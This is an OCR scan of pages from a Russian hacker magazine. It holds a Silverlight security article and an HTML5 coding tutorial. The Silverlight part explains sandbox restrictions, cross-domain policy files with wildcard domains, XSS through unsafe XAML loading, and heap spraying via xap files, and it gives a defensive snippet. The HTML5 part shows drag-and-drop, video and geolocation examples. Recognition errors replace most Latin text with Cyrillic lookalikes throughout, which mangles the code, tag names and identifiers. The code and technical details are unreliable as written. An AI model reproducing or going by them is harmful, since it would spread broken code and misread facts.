приложений, нота кие 8І_-контролы можно запускать какотдельные 
приложения. 

• оиі Ьгоѵѵзег Ігизіесі тосіе — доверительный режим выполнения 
ЭіІѵегІідЫ-кода предоставляетему полный доступ кфайловой системе, 
сети и другим ресурсам, но должен быть подтвержден пользователем 
при установке приложения. 

Наибольшую потенциальную опасность представляют собой прило- 
жения іп Ьгоѵѵзег, поскольку они не требуют от пользователя никаких 
дополнительных действий для запуска ЭіІѵегІідЫ-кода, а начинают 
работать сразу после загрузки ѵѵеЬ-страницы. Этот способ выполнения 
ЗіІѵегІідЫ-кода сейчас наиболее распространен, поэтому речь дальше 
пойдетв основном отаких контролах. 

ЗапсІЬох 

При ограничении доступа запсІЬохесІ-приложений кфункционально- 
сти платформы существуют два основных принципа: 

• изегіпШаІесі —доступ приложений копределенной функционально- 
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Основное применение 
ЗіІѵегІідМ сейчас — создание 
НісЬ ІпІегпеІ Арріісаііоп 




сти (например, использованиеѵѵеЬ-камеры, которое стало возможным 
в четвертой версии ЗіІѵегІідЫ;) только в ответ на действия пользовате- 
ля. То есть во время обработки событий КеуОоѵѵп/КеуІІр/МоизеОоѵѵп/ 
МоизеІІр. 

Идея простая — контрол не можетскрытно, без участия пользователя, 
совершать потенциально опасные действия. Есть, конечно, соци- 
альная инженерия, и многие юзеры могут-таки кликнуть на кнопку, не 
совсем понимая, что от них хотят, но это уже другой вопрос. 

• зате огідіп роіісе — если два файла загружены с одного доменного 
имени, считается, что они получены из одного источника. 

На взаимодействие объектов, которые загружены из разных ис- 
точников, накладываются значительные ограничения. Первому 
принципу соответствуют следующие три фичи системы безопасности 
5і Іѵегіід Ы; : 

1 . ОрепРіІеОіаІод/ЗаѵеРіІеОіаІод — ЗіІѵегІідЫ: позволяет приложениям 
читать и писать в файлы, расположенные на машине пользователя, 
нотолько послетого, как пользователь выберет их в стандартном диа- 
логовом окне. Причем приложение не может предложить дефолтное 



имя файла и каталог. Для файлов, созданных приложениями ЗіІѵегІідЫ:, 
будет добавлен атрибут «за гружен из сети». 

2. ѴѴеЬсат/МісгорЬопе- 5І_-приложение начиная с версии 4.0 имеет 
доступ к микрофону и ѵѵеЬ-камере, которые установлены на машине 
пользователя, нотолько послетого, как пользователь подтвердит 
это. Один раз полученное разрешение действует, пока страница с 
5І_-приложением не будет закрыта. Необходимость такого ограниче- 
ния понятна: никому нехочется, чтобы за ним подсматривали через 
ѵѵеЬ- камеру. 

3. СІірЬоагсі ассезз — начиная с версии 4.0 приложения ЗіІѵегІідЫ могут 
получать доступ ксистемному буферу обмена. Риск, которому при этом 
подвергаются данные пользователя, очевиден. Поэтому доступ к буферу 
обмена также должен быть разрешен пользователем в ответ на запрос 
ЗіІѵегІідЫ:. Принцип ограничения кроссдоменного доступа клокальным 
данным в ЗіІѵегІідЫ оформлен в виде ізоіаіесі зіогаде. Изолированное 
хранилище данных приложений ЗіІѵегІідЫ позволяет странице со- 
хранять данные в специальном каталоге на жестком диске клиентской 
машины. Приложения БіІѵегІідЫ:, загруженные с одного домена, делят 
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одно изолированноехранилище и имеют доступ ксохраненным данным 
друг друга. Поумолчанию на каждый домен выделяется до 1 Мб диско- 
вого пространства, но этот предел может быть увеличен пользователем 
по запросу приложения. 

Сетевое взаимодействие 

Из-за наличия бгеѵѵаІГов приложение БіІѵегІідЫ, выполняемое на ма- 
шине пользователя, может и меть доступ ксерверам, ккоторым не имеет 
доступа источник, с которого оно было загружено. В целях предотвра- 
щения неавторизованного доступа 5І_ требует, чтобы сторонние сервера 
имели файлы кроссдоменной политики, хранящие списокдоменов, с 
которых разрешено к ним обращаться. БіІѵегІідЫ поддерживает два типа 
файлов, отвечающихза кроссдоменную политику: 

1 . сгоззсіотаіп.хппі — файл кроссдоменной политики, который исполь- 
зует РІазЫплеер: 



<?хт1 ѵег5Іоп="1.Ѳ"?> 

<сго5 5-сІотаіп-ро1ісу> 

<а11оы-Іі1:1:р-гедие5І:-ІіеасІег5--Ргот сІотаіп="*" 

ІіеасІег5= ,, 50АРАс1:іоп^оп1:еп1:-Туре ,, /> 

</сго55-сІотаіп-ро1ісу> 

2. сІіеЫассеБзроІісу.хтІ — собственный формат, используемый 
БіІѵегІідЫ: 



<?хт1 ѵеп5Іоп="1.0" епсосIіп§= ,, и1:■Р-8 ,, ?> 

<ассе55-ро1ісу> 

<сгоз5-сІотаіп-ассе5 5> 

<ро1ісу> 

<а11оы--Ргот Іі1:1:р-гедие5І:-ІіеасІег5= ,, 50АРАс1:іоп ,, > 
ссіотаіп игі="*"/> 

</а11оы--Ргот> 

<§гап1:-1:о> 

<ге5оипсе раѣ^"/" іпс1исІе-5иЬра1:Іі5= ,, 1:гие ,, /> 

</§гап1:-1;о> 

</ро1ісу> 

</сго55-сІотаіп-ассе5 5> 

</ассе55-ро1ісу> 

Также, какдлятега <іппд> в НТМЦ объекты Іпладе и Мебіа в БіІѵегІідЫ; 
способны загружать изображения и медиафайлы с любого домена без 
дополнительных ограничений. Но для предотвращения утечки инфор- 
мации на домен-источник5І_-приложения, оно не имеет доступа ккон- 
тенту этих файлов и даже не можетточно определить, есть файл с таким 
именем или нет. В дополнение к НТТР-запросам, БіІѵегІідЫ; позволяет 
приложениям использовать ТС Р/ІЮ Р- со кеты. Однако порты, ккоторым 
будет коннектиться приложение, должны быть явно прописаны в файле 
кроссдоменной политики. Для предотвращения конфликта с другими 
сервисами диапазон портов ограничен, и коннектиться можно кТСР/ 
ІЮР-портам 4502-4534. Поддерживаются толь ко исходящие соедине- 
ния. Создать слушающий сокет в БіІѵегІідЫ-приложениях невозможно. 

Десктопные приложения БіІѵегІідЫ 

Приложение оЫ о^ Ьгоѵѵзег — это обычное іпбгоѵѵзег-приложение 
БіІѵегІідЫ;, которое пользовательустановил на свою машинулокально, 
выбрав пунктЫпзіаІІ» из контекстного меню БіІѵегІідЫ. Какуже было 
сказано выше, десктопные ББ-приложения могут быть л ибо запсіЬохесІ, 
либо Ігизіесі. Песочница для десктопных приложений БіІѵегІідЫ создает 
те же ограничения, что и для браузерных БіІѵегІідЫконтролов, кроме 
следующих: 

• размер изолированного хранилища по умолчанию увеличен до 25 Мб; 

• можно изменять размер окна приложения (в неЫшзІесІ приложениях 
эта возможность запрещена, чтобы предотвратить «сіісіфаскіпд» атаку, 
когда из-за изменения размера окна происходит клик не натом элемен- 
те, на котором хотел кликнуть пользователь]. 

Что касается ігизіесі-приложений.то они запускаются вне песочницы и 



«Тгапзрагепі» код 
Зііѵегіідііі-контрола 
взаимодействует с ОС через 
два слоя безопасного кода 
ЗіІѵегІідНІ-платформы 



Тгапзрагепі Сосіе 




БаіеСгЖсаІ Сосіе 



і 



БесигіІуСгЖсаІ Сосіе 



получают доступ кдополнительной функциональности платформы: 

• возможность вызова методов СОМ-серверов; 

• свободное чтение/записьфайлов; 

• кроссдоменныезапросы возможны без файлов кроссдоменной по- 
литики на сервере. 

Но поскольку Ігизіесі БіІѵегІідЫ-приложения все же представляют собой 
управляемый код, они менее подвержены таким ошибкам какперепол- 
нение буфера или целых чисел и, соответственно, более безопасны, чем 
нативные. 

Эксплуатация уязвимостей 
Бііѵегіідт-контролов 

Каки в случае 5аѵа5сгірІ + НТМЦ при использовании БіІѵегІідЫ- 
приложений существует возможность сгозззііезсгірбпд (Х55) атаки, 
когда можно исполнять код на машине клиента так, как будто он был за- 
гружен с сайта-жертвы. Х55 открывает доступ к кукам, изолированному 
хранилищу и информации об авторизации сайта-жертвы. Стандартное 
исполнение Х55- это инжектНТМШаѵаБсгірІ-кодаза счет дыр в об- 
работке ввода пользователя сайта, который передается на сервер. 
Возможность реализации ХББ-атаки через БіІѵегІідЫ-контролы есть, но 
она менее вероятна, чем в обычном НТМШаѵаБсгірІ;. 

Х55 обычно происходит из-за того, что злоумышленник получает воз- 
можностьдобавлять строки на страницубезэкранирования НТМІ_- 
тегов. Однако БіІѵегІідЫ-приложения редко формирует НТМІ_- или 
ХАМБ-код простым объединением строк, то есть, в них намного чаще 
можно видеть 

туЬох.ТехІ: = ЬасІ51;гіп§; 

вместо 

ХатІКеасІег. ІоасІ("<Тех1;В1оск.Тех1;= " + ЬасІ51:гіп§ + 
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Кроссдоменный доступ 
запрещен по умолчанию 



ШрУЛоо.сот 




Таким образом, ХЗЗ-атака возможна, если 5І_-контрол делает что- 
нибудь вроде: 

• ХапЫРеасІег.І_оасІ() со строкой злоумышленника; 

• А55етЫу.І_оасІ(] с ОН, которую может подменить злоумышленник; 

• 5І_-контрол использует неэкранированные строки при создании 
ХАМІ_- или НТМІ_-разметки через ЗузІет.ѴѴіпсІоѵѵз.Вгоѵѵзег; 

• 5І_-приложение использует сторонние хар-файлы и есть возможность 
загрузки такихфайлов клиентом на сервер. 

Во всех этих случаях необходим анализ хар-файла для поиска такихуяз- 
вимостей. На самом деле ЗіІѵегІідЫ-сборки очень редко обрабатывают 
обфускатором, а реверсинг тападеб-приложений — задача попро- 
ще, чем реверсинг пабѵе-кода. Поэтомуанализ контрола на подобные 
уязвимости не слишком сложен. 

Следует сказать, что наиболее распространенная Х55 ѲІЕАР-атака, при 
которой загружаемый медиа-контент может быть исполнен плагином, 
в случае с ЗіІѵегІідЫ невозможна, поскольку ЗіІѵегІідЫ-плагин считает 
объектЗіІѵегІідЫ-приложением только если для него задан корректный 
МІМЕТуре«аррІісаІіоп/х-зі1.ѵегІідЬі-арр». 

И, наконец, существует возможность использовать .хар-файлы для 
стандартной Ьеар-зргау атаки, каки другой подгружаемый браузером 
контент. В этом случае блоки пабѵе-кода, которыми засоряется куча 
браузера, располагаются вхар-файле, что делает Ьеар-зргау менее 
очевидной при анализе ѵѵеЬ-страницы. 




Если на твоей странице располагаются сторонние ЗіІѵегІідЫ-контролы, 
которым ты не очень доверяешь, то один из возможных способов за- 
щиты — это задать свойство ЕпаЫеНіпЫАссеззутега обіесі, в котором 
подгружается ЗіІѵегІідЫ-контрол. Это свойство определяет, возможен ли 
доступ со стороны 5І_-контрола к НТМІ_- контенту и методам ^ѵаЗсгірЕ 
Поумолчаниюэтосвойствоустанавливается вігие, если страница и 



контрол загружены с одного домена, и в ба Ізе — в противном случае. 

Если ты хочешь, чтобы твой ЗіІѵегІідЫ-контрол нельзя было повесить 
на чужую страницу, можно добавить в код инициализации следующие 
строки: 

і-р (Арр.Сиггеп1:.Но5'Щ5е1:1:іп§5.ЕпаЫеНТМІ_Ассе55 == -Раізе) 
ііііпоы пем Ехсер1:іоп(); 

5І:гіп§ Ыітіигі = 5уз1;ет.1лІіпсІоы5 . Вгоызег . Н1:т1Ра§е.Ооситеп1: . 

ОоситеггШгі . То51:гіп§( ) ; 
і-р (бѣтіигі != "Ітр-рр: //ту. сот/ту. ІгРтІ") 

■рріпоіл/ пеы Ехсер1:іоп(); 

Если со стороны ЗіІѵегІідЫ-контрола на сервер уходят данные, то на 
стороне сервера необходимо их правильно обработать: 

— в опасных местах (например, обращение кбазе) нужно проверять и 
экран и ровать данные от ЗіІѵегІідЫ:- контрола, та к как он и могут содер- 
жать, например, 5СН_инъекции; 

— для большей надежности можно проверять сайт-источникзапроса 
(возможность задать геРегег появилась в ЗіІѵегІідЫ; 4.0). 

Если тебе нужно сохранять важные данные в изолированном храни- 
лище, то необходимо шифровать их. Равно каки куки, данные из 15 
могут быть доступны администратору машины. Крометого, ІЗдоступно 
для любого приложения стогоже домена. Иначе говоря, если кто-то 
контролирует РЫЗжертвы, он может получить доступ к этим данным. 
Другой способ неавторизованного доступа к 15 — Х55 описан выше. 

Заключение 

ЗіІѵегІідЫ- платформа сама по себе довольно безопасна, но решаю- 
щее значение, какэто обычно бывает, имеетто, какона используется. 
ЗіІѵегІідЫ- контрол, созданный без внимания к безопасности, может 
оказаться слабым звеном ѵѵеЬ-страницы и легкой добычей для 
хакера, т 
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РЕЦЕПТЫ 

НТМІі 

Погружаемся в кодинг под НТМІ.5 
на конкретных примерах 

о Кто на свете всех милее, всех румяней и желанней? Не подумай 
ничего пошлого, я имею в виду всего лишь новую версию языка 
разметки - НТМІ.5. Последние версии современных браузеров уже 
понимают некоторые НТМІ.5-фишки, а значит - самое время начать 
применять его в своих проектах. 




Что такое НТМи>? 

На первый взгляд НТМІ_5 — это всего лишь новая версия языка раз- 
метки. Однако сейчас под этим термином подразумевают несколько 
иное. Рассматривать НТМІ_5 без упоминания того же С553 просто 
нелепо, поскольку для разработки действительно современных 
ѵѵеЬ-приложений без него никак не обойтись. Нельзя забывать и о 
ЗаѵаБсгірІ. С его помощью реализуется обращение кбогатомуАРІ, 
описанному в стандарте НТМІ_5. Резюмируя все вышесказанное, на- 
прашивается определение: НТМІ_5 — это совокупность современных 
технологий/стандартов (35, НТМІ_5, 0553 и такдалее], применяемых 
для разработки ѵѵеЬ-приложений. 

Капелька истории 

НТМІ_5 появился отнюдь не внезапно. Его разработка началась еще 
в 2007 году. За процесс работки отвечала специально созданная 
группа от консорциума ѴѴЗС. Но многие возможности НТМІ_5 были 
придуманы еще в рамках стандарта ѴѴеЬ Арріісаііоп 1 .0, а над ним 
корпели ажс 2004 года. Такчто в реальности НТМІ_5 нетакая ужи 
юная технология, как может показаться на первый взгляд. 

Первая черновая версия спецификации НТМІ_5 стала доступна уже 
22 января 2008 года. Прошлотри года, но окончательная версия 
спецификации так и не готова и вряд ли поспеет в ближайшие год- 
два. Этот печальный моментобязывает разработчиков аккуратно 
применять новые возможности в своих проектах. Спецификация мо- 
жетзапросто поменяться, да и не все современные браузеры (РігеРох 



4, Ѳоодіе СИ готе 1 0, ІЕ9, Орега 1 1 ) в полной мере поддерживают 
новые возможности. 

Полезные рецепты 

Говорить о теории НТМІ_5 можно очень долго, но рубрика у нас назы- 
вается «Кодинг», поэтому я предлагаю тебе прочувствовать возмож- 
ности стандарта на практике. Я не стал заморачиваться над создани- 
ем сверхоригинальных рецептов, а решил привести примеры вещей, 
которые действительно полезны и которые уже сейчас можно и нужно 
применять на своихсайтах. Итак, поехали. 

Рецепт №1: Включаем Огад&Огор на 
полную 

Одной из приятных ня шек (наверное, зря ты употребил столько 
энергетиков, ведьтут должно быть слово «фишек» — прим, ред.) 
НТМІ_5 стала возможность применения Рііе АРІ и О гад апб Эгор АРІ. 

С их помощью можно организовать красивую передачу файлов с 
компьютера пользователя на сервер. Помнишь, раньше для отправки 
файлов всегда было поле с кнопочкой «Вгоѵѵзе»? После ее нажатия 
появлялся стандартный диалог выбора файлов, в котором и требова- 
лось выбрать файл для передачи. Назвать этот способ удобным язык 
не поворачивается. Особенно если речь идето добавлении в очередь 
загрузки нескольких файлов. 

Чуть позже умельцы начали лепить аплоадеры на флеше, которые 
предоставляли больший функционал, но имели серьезный недо- 



► 106 



ХАКЕР 06 /149/ 201 1 








~==§!!! гПІр 



Область для приаттачивания файлов 



КАК ПОДСТРАХОВАТЬСЯ? 



На протяжении всей статьи я говорил, что в настоящий момент 
современные браузеры поддерживают разный объем возможностей 
НТМІ_5. Именно поэтому нужно быть аккуратным и стараться не 
использовать уж очень экзотичные вещи. Сразу возникает вопрос: «А 
как узнать, какие возможности НТМІ_5 поддерживает определенный 
браузер?». Есть несколько способов решения этой задачи, но мне 
больше всего по душе применение крошечной 4аѵа5сгірІ-библиотеки 
— Мобегпігг (тобегпігг.сот). Библиотека распространяется 
совершенно бесплатно и стоит ее подключить к своему проекту, 
как она сразу выведет список возможностей НТМІ_5, которые 
поддерживает твой браузер. Чтобы протестировать функциональность 
библиотеки, тебе не обязательно сразу ее качать и подключать к 
своему проекту. Достаточно просто зайти на официальный сайт 
библиотеки и ты сразу увидишь, что поддерживает твоя бродилка, а 
что нет. Посмотри скриншоты посещения сайта при помощи Ооодіе 
СЬготе и Іпіегпеі: Ехр1огег9. Несмотря на хорошую рг-компанию 
и восхваляющие статьи, бродилка от Місгозо^ явно поддерживает 
меньше возможностей, нежели Соодіе СЬготе. 



статок— потребность в установленном флеше. Крометого, в обоих 
случаяху пользователя не было возможности добавлять файлы для 
передачи путем простого перетаскивания мышкой на страницу. 

А ведьтехнология Огад&Огор применяется в системе сплошь и 
рядом. Мне лично всегда хотелось просто выделить нужные файлы 
и легким взмахом крысы кинуть на страницу. Это куда удобней, 
чем рыскать в поисках файла при помощи стандартного диалога. 
НТМБ5 внес свои коррективы, и теперь ничто не мешает органи- 
зовать полноценный Огад&Огор для передачи файла на страницу. 
Первыми эту фичу реализовали гугловчане в бтаіі. Если ты поль- 
зуешься гмылом, то наверняка давно заметил область, на которую 
можно перетащить файлы для приаттачивания к письму. Лично я 
активно пользуюсь этой функцией и сейчас покажутебе, какза- 
мутитьтакую же для своего проекта. Наш проект будет состоять из 
трех файлов: затрІе.ЫтІ, зіуіе.сзз и зсгіріздз. Мы, конечно, могли 
бы ограничиться и одним Ыті-файлом, но тогда код получился бы 
нечитабельным. Не нужно мешать НТМБ с 45 или С55. Лучше все 
разбить по файлам, и потом спокойненько с ними работать. Первым 
делом подготовим структуру нашего приложения. Создавай файл 
затрІе.ЫтІинапишивнем: 




Предварительный просмотр приложения 



НТМІ.5 ПОДВИНЕТ ЕІ.А5Н 



Одной из самых интересных фишек НТМБ5 является возможность 
создания анимации. Достигается это путем микса НТМБ5 и С553. 
Такая анимация выглядит достаточно красиво и во многих случаях 
сможет заменить Еіазб. Могу с уверенностью сказать, что это будет 
очень не скоро, поскольку сейчас ЕІазЬ освоить проще, нежели 
разобраться в малопонятном НТМЕ5/С553-коде (имхо]. Тем не менее, 
знать о такой фиче ты обязан. Крайне рекомендую тебе пройтись по 
нижеприведенным ссылкам и своими глазами увидеть красивые 
демки, демонстрирующие возможность анимации. 

• Красивая демка, показывающая возможности Сапѵаз’а: 
сот/ІаЬз/ЫтІ сапѵаз : 

• Красивая Зй-шкатулка со встроенной строкой поиска отОоодІе: 

асІсІѵозппапі.сопп/гезоигсез/доодІеЬох : 

• Один клик мышью, и страница начнет заполняться шарами. 

Больше кликов — больше шаров. Как наполнишь страницу до краев 
— попробуй их резко перетащить. Выглядит очень забавно: 

сот/ргоіесІз/сЬгоппеехрегіппепІз/Ьаи рооі : 

• Просто обалденная демка, демонстрирующая различные 
химические соединения. Обязательно стоит посмотреть: . 

сот/сапѵазтоі : 

• Ты когда-нибудь хотел почувствовать себя патологоанатомом 
и исследовать тайны человеческого тела? Если да, то этотлинк 
точно для тебя. Компания Ооодіе сделала отличную демку из смеси 
технологий ѴѴе ЬОБ, НТМБ5, 0553 и ЕІазЬ. Результатом коктейля стало 
интерактивное приложение, демонстрирующее ЗБ-тело человека, у 
которого ты можешь рассматривать строение внутренних органов. 

Я когда увидел его в первый раз — не мог оторваться. Рекомендую: 
ЬосІѵЬгоѵѵзег.доодІеІаЬз.сот . 



<сііѵ ісІ="Ьох ,, ><5рап ісІ="1аЬе1">Тащи свои файлы сюда</зрап> 
</сііѵ> 

</ЬосІу> 

</Іі1:т1> 

Для удобства написания кода на 4аѵа5сгірІ я подключил библиотеку 
] ц и е гу. После этого описал структуру будущего Ыті- документа. Она 
проста до безобразия — нам требуется описать поле, на которое 
пользователь должен перетягивать файлы. Для этого необходим 
лишь один біѵ-контейнер. Если сейчас открыть страницу в браузере, 
то ничего хорошего ты неувидишь. Чтобы наше поле стало заметным 
визуально, требуется его оформить при помощи С55. Открываем 
файл 5ІуІе.с55 и пишем в него следующий код: 



< ! йОСТУРЕ ІтбтЪ 
<б1:т1> 

<ИеасІ> 

сііпк Ііуре^'Ііех-б/сББ" геЗѴБІіуІеБІіееІ:" 
тесИа="а11" І'іге-Р^'БІіуІе.сББ" /> 

<5сгір1: 5гс="ддиепу.д5" 1:уре= ,, 1:ех1:/даѵа5сгір1:"></5сгір1:> 
<5сгір1: Ііуре^'ІіехІі/даѵаБсгірІ:" 5пс="5сгір1:5 о*5"х/5Сгір1:> 
</беасІ> 

<ЬосІу> 



#Ьох { 

ыісИсМ : 500рх; 

Меі^МІ: : 300рх; 

Ьогсіег: 2рх сІаБІіесІ #000000; 
Ьаск§поипсІ-со1ог: #РСРРВ2; 
1:ех1:-а1і§п : сепііег; 
соіоп: #3091РР; 

-РогЩ-БІге: 2ет; 

■Роп1:--Раті1у: Ѵегсіапа, БапБ-Бегі-р; 
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Приложение в действии 

-тоі-ЬогсІег-гасІіиБ: 8рх; 

-ыеЬкіІі-ЬопсІег-гасІіиБ: 8рх; 

} 

#1аЬе1 { 

ро5І1:іоп: пеіаіііѵе; 

1:ор: 2%; 

} 

Идентификатор «Ьох» — это и есть наш будущий контейнер для 
приема файлов (на эту область пользователь должен перетаскивать 
документы). Чтобы юзер не промахнулся, я делаю область побольше 
и в качестве варианта обрамления выбираю сІазЬесІ — пунктирные 
линии. Обычные пунктирные линии смотрятся не очень, поэтому я 
сразу задаю значения для свойств: -тог-богсіег-гасііиз и -ѵѵеЬкіІ- 
Ьогбег-габіиз. Вот сейчас ты можешь открыть созданную страницу в 
браузере и оценитьобщий вид. 

Однако если сейчас попробовать что-то перетащить, то ничего ин- 
тересного не произойдет. Перетаскиваемый файл просто откроется 
в ѵѵеЬ-браузере, и все. Исправить ситуацию поможет небольшой 
кусочек кода на ^ѵаЗсгірІ: 

$(сІоситеп1:) .геасІу(-Рипс1;іоп() { 

//Добавляем обработчики событий 
ѵаі туЬох = сІоситепІі.^еІіЕІетепІіВуІсІС'Ьох") 
туЬох.асІсІЕѵепІіІІБІіепегС'сІгаёепІіег'Ч сІга§Еп1:ег, -Раізе); 
туЬох. асІсІЕѵепІіІІБІіепегС'сІгабехіІі'Ч сІга^ЕхіІ:., : аІ5е); 
туЬох. асІсІЕѵепІіІІБІіепегС'сІгабоѵег'Ч сІга§Оѵег, : а1зе); 
туЬох. асІсІЕѵепІіІІБІіепегС'сІгор'Ч сігор, -РаІБе); 

}); 

■РипсЫоп сІга§Еп1:ег(еѵ1:) { 
еѵі: . 5І:орРгора§а1:іоп ( ) ; 
еѵі: . ргеѵегѵШе-РаиІІ: ( ) ; 

} 

-РипсЕіоп сІга§Ехі1:(еѵ1:) { 
еѵі: . 5І:орРгора§а1:іоп ( ) ; 
еѵі: . ргеѵегѵШе-РаиІІ: ( ) ; 

> 

■РипсЬіоп сІга§Оѵег(еѵ1:) { 
еѵі: . 5І:орРгора§а1:іоп( ) ; 
еѵі: . ргеѵегѵШе-РаиІІ: ( ) ; 

> 

■Рипс1:іоп сІгор(еѵ1:) { 
еѵі: . 5І:орРгора§а1:іоп ( ) ; 
еѵі: . ргеѵегѵШе-РаиІІ: ( ) ; 
ѵаг б1е5 = еѵ1:.сІа1:аТгап5-Реп.1і1е5; 
ѵаг соипі: = б1е5.1еп§1:1і; 

(соипі: > 0) 




Смотрим видео средствами НТМи> 



ІіапсІ1еРі1е5(1і1е5); 

} 

-Рипсѣіоп ІпапсІ1еРі1е5(б1е5) { 

//Берем первый файл 

//Если требуется работать с несколькими 
//файлами, то здесь нужно организовать перебор 
ѵаг біе = б1ез[0]; 

сІоситеп^.^е^ЕІетепѣВуІсІС'ІаЬеІ") .іппегНТМІ_ = 

"Поймал: " +б1е.пате; 
ѵаг геасіег = пем Рі1еКеасІег(); 
геасіег. опрго§ге55 = ІіапсІ1еКеасІегРго§ге55; 
геасіег. геасІА50а1:аІЖІ_(б1е); 

} 

■Рипсѣіоп ІпапсІ1еВеасІегРго§ге55(еѵ1:) { 
і-р (еѵ1:.1еп§1:ІіСотри1:аЫе) { 

(еѵр.іоасіесі = еѵТ.ТоТаІ) { 
аІег-РС'Загружен. . . ; 

} 

} 

} 

На первый взгляд код может показаться громоздким и непонятным, 
ноте, кто хоть немного знаком с ^ѵаЗсгірІ и ] ц и е гу, сразу должны 
разобраться с происходящим. В самом начале я определяю события, 
возникновение которых меня интересует. Для каждого из них я опи- 
сываю отдельную функцию. Например, событие сі гад Ехіі: возникает, 
когда пользователь перемещает курсор мыши из элемента, над 
которым происходитоперация перетаскивания. Если пользователь 
перетащил файл, то управление беретна себя функция ЬапсІІеРіІезО. 
В ней я преднамеренно обращаюсь к самому первому файлу (бІезШП 
и начинаю с ним работать. Учти, пользователь может перетащить за 
раз сразу несколько файлов. Еслитвое приложение должно уметь 
обрабатывать та кие ситуации, то организуем перебор всего масси- 
ва б(ез. В функции НапсНеЕіІезО происходит все самое интересное. 
Сначала я вывожу в элемент ІаЬеІ (помнишь надпись «Тащи свои 
файлы сюда»?) имя файла, который пользователь перетянул на ак- 
тивную область, а затем начинаю его считывать при помощи объекта 
типа ЕіІеРеасІегО. Подробней про него можно почитать в этой статье: 
ЫтІбгоскз.сотДиІогіаІзЛіІе/сІпсІбІез . На всякий случай я определяю 
обработчиксобытия опРгодгезз для объекта типа ЕіІеРеасІегО. Это 
событие будет вызываться каждый раз, когда произойдет считыва- 
ние порции данных. В самом обработчике я выставил условие: если 
объем загруженных данных равен размеру файла, значит, считыва- 
ние успешно завершено, и можно выводить радостное сообщение. 

Рецепт №2; Пей пиво, смотри ви- 
део, слушай рок 

До появления НТМІ_5 просмотр видео в ѵѵеЬ’е осуществлялся при 
помощи всевозможных НазЬ-плееров. Нельзя сказать, что просмотр 
видео этим способом неудобен. Проблемы есть разве что в безопас- 
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ности (в последнее время ЕІазЬ Ріауег просто кишитуязвимостями) и 
необходимости установки самого плагина. Стандарт НТМІ_5 предла- 
гает элегантное решение — встроенная возможность проигрывания 
видео- и аудио-контента. 

Наверное, многие уже догадались, что я говорю о тегах <аисІіо> 
и <ѵісІео>. Они-то и позволяют встраивать аудио и видео прямо в 
страницу. Единственное огорчение, с которым приходится сталки- 
ваться — набор поддерживаемых кодеков. Увы, для каждого браузера 
этот набор различен, поэтому есть большая вероятность, что твой 
видеоролик будет прекрасно отображаться в СЬготе, а пользователи 
РігеРохуйдутлесом. Чтобы не попасть в такую ситуацию, рекоменду- 
ется позаботиться о подстраховочном варианте — воспроизведению 
ролика с помощью ЕІазЬ-плеера. О няшках (нет, все-таки он не пере- 
путал слова, придется пролечить его электросудорожной терапией от 
аниме-зависимости — прим. Лозовского] и проблемах поговорили, 
теперь перейдем к практике. Для демонстрации воспроизведения 
видео я накидал простенький примерчик: 



< ! РОСТУ РЕ И1:т1> 

<Іі1:т1><ЬосІу><ѵісІео 5гс="ѵісІео--Рог-5атр1е-1.тр4" 
ро5*ег= ,, 5сгееп--| : ог-5атр1е1. др§" соп*гоІ5> 

Здесь должно быть видео. Если ты видишь этот текст, то твой 
браузер не поддерживает новый стандарт. 

</ѵісІео></ЬосІу></ІтІ:т1> 

Обрати внимание, что в примере длятега <ѵібео> яуказал атрибут 
розіег. В нем я указываю путь к графическому файлу, который должен 
быть отображен сразу после загрузки страницы — «первый кадр». 
Для чего это может пригодиться? Как вариант, в качестве такого изо- 
бражения можно вставлять логотип своей компании/проекта. 

Тег <аисІіо> применяется аналогичным образом. В нем разрешено 
указать сразу несколько источников на медиафайл. Таким образом, 
ты можешь выложить один и тотже файл в разных форматах (одд, 
трЗ). Если в браузере пользователя отсутствует кодек трЗ, то будет 
предпринята попытка воспроизвести одд. Получается, что путем не- 
сложных манипуляций легко решить проблему совместимости и быть 
уверенным, что пользователю удастся воспроизвести контент. 

Рецепт №3: уѴЬеге аге уои поѵѵ 
(деоТоса+іопАРІ) 

беоіосаііоп АРІ — программный интерфейс для определения коорди- 
нат пользователя. На основании полученных данных легко отметить 
местонахождение юзера, скажем, на Ѳоодіе Марз. Где можно при- 
менять эту возможность? Да много где! Например, разработчики 
популярного сервиса микроблоггинга Тѵѵіііег используют Ѳеоіосаііоп 
АРІ вѵѵеЬ-интерфейсетвиттер-клиента. Если пользователь разрешает 
получать сведения о своем местоположении, то ко всем его твитам 
будет добавляться город, в котором он находится в данный момент. 

Не сомневаюсь, что сейчастебя мучает вопрос: «А откуда 6АРІ по- 
лучают сведения о местоположении?». Даже не думай, что в деле 
замешаны спутники-шпионы и прочие бондовские штучки. Все куда 
прозаичней — пакет информации для анализа строится на осно- 
вании данных об ІР-адресе, ближайших ѴѴі-Рі хотспотах, 0Р5 (при 
наличии устройства), Ѳ5М сеіі Ю и так далее. Если заинтересовался 
теорией и практикой получения примерных координат из перечис- 
ленных выше источников, то советую поднять подшивку ][ и найти 
статью Зіер’а по даннойтеме, где он хорошо разобрал теорети- 
ческую часть, а также дал обзор соответствующего софта. Теперь 



взглянем на пример использования ОАРІ. Все предельно просто и 

ПОНЯТНО: 

сЮОСТѴРЕ Гі1:т1> 

<Ті1:т1> 

<ЬосІу> 

<5сгір1: 1ап§иа§е="3аѵа5сгір1: ,, > 

(паѵі§а1:ог .§ео1оса*іоп) { 
паѵі§а1:ог . §ео1оса*іоп . §е*Сиггеп1:Ро5І1:іоп( 

■РипсТіоп (роБІІііоп) { 

сіоситеп* . §е*Е1етеп1:ВуІсІ ( "Іаіііііисіе" ) . іппегНТМІ_ = 
ро5І1:іоп . соогсіб . 1а*і1:исІе; 
сіоситепі:. беІіЕІетепІіВуІсІС'Іоп^іІіисІе") .іппегНТМІ_ = 
роБІІііоп . соогсіб . 1оп§і1:исІе; 

ъ 

); 

} 

</5сгір1:> 

<сііѵ ісІ="соогсІ5">Широта: <5рап ісІ="1а1:і1:исІе ,, >ІІпкпоып</5рап> 

<Ьг />Долгота: <5рап ісІ="1оп§і1:исІе ,, >ІІпкпоып</5рап><Ьп /> 

</сііѵ> 

</ЬосІу> 

</Ті1:т1> 

Перед тем как пытаться получить координаты, необходимоубедиться, 
что браузер поддерживает 6АРІ. Если метод деоіосаііоп вернул Ігие, 
то все в порядке и можно выполнить попытку получения коорди- 
нат. Для этого воспользуемся методом деІбиггепіРозіІіоп объекта 
паѵідаіог. В случаеуспеха мы получим координаты, которые прями- 
ком отправятся в документ. 

Рецепт №4: База данных в браузере 

При разработке ѵѵеЬ-приложений мы привыкли использовать базы 
данных. Му5С!І_, 5СП_і1е — продукты, знакомые каждому програм- 
